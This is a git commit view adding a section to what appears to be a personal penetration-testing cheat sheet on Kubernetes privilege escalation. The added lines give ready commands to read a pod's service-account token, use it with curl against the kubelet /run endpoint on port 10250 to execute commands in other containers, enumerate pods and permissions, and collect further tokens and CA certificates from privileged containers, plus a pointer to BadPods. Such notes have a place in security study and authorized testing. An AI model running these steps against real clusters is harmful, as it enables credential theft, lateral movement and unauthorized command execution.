added enumeration with elevate token

This commit is contained in:
Stefan Friese 2022-09-06 22:02:37 +02:00
parent b8e4ca9782
commit 7c0874c0f3
1 changed files with 34 additions and 1 deletions

View File

@ -29,6 +29,37 @@ kubectl get pods --token=$TOKEN
kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
```
* __Do not copy the token around, it will end in a carfuffle of some truncated string most of the time. Just do it in the following way and spare the pain for another day__
```
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
```
### Elevate Permissions with found token
* If a token has been found but its permissions on other containers can not be used through kubectl directly, use curl
```sh
curl -k -H "Authorization: Bearer $TOKEN" --data "cmd=id" https://$K8_IP:10250/run/$NAMESPACE/$POD/$CONTAINER
```
* Find namespace and pods
```sh
kubectl get pods -A
```
* Find name of container inside the pod description under `ContainerStatuses/name`
```sh
kubectl get pod $POD -n $NAMESPACE -o yaml
```
* Interesting find in any high priv container are
```sh
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/ca.crt
```
* Enumerate again with the new found token
```sh
kubectl auth can-i --list
```
## Create Pods
* Use [BishopFox's BadPods](https://github.com/BishopFox/badPods.git)
@ -46,3 +77,5 @@ kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash
```sh
kubectl exec -it <podname> -n <namespace> -- /bin/bash
```